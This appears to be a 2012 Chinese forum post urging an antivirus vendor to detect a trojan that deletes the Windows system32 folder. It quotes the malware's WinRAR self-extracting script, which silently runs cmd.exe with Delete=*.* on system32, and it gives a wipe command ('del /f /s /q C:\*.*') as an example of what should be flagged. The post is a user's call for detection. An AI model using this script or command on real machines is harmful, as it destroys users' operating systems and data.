立刻回答 - 2012-8-24 20:59:00
该病毒利用了WINRAR与WINDOWS的漏洞:
附件: 您所在的用户组无法下载或查看附件
瑞星对这种病毒一点也不敏感(Trojan.Win32.KillFiles),该病毒会利用WINRAR与WINDOWS的漏洞删除%windir%\system32下所有文件
我认为只要是包含删除命令(在系统盘上)与“*.*”(如:del /f /s /q C:\*.*),瑞星就应该报毒:Harm.Script.BAT.KillFiles
用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; 360SE)
附件: 您所在的用户组无法下载或查看附件瑞星对这种病毒一点也不敏感(Trojan.Win32.KillFiles),该病毒会利用WINRAR与WINDOWS的漏洞删除%windir%\system32下所有文件
我认为只要是包含删除命令(在系统盘上)与“*.*”(如:del /f /s /q C:\*.*),瑞星就应该报毒:Harm.Script.BAT.KillFiles
;下面的注释包含自解压脚本命令
Path=%SystemRoot%\system32\
Setup=cmd.exe
Presetup=cmd.exe
Silent=1
Overwrite=1
Update=U
Delete=*.*
;下面的注释包含自解压脚本命令
Path=%SystemRoot%\system32\
Overwrite=1
Update=U
Delete=*.*
用户系统信息:Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; 360SE)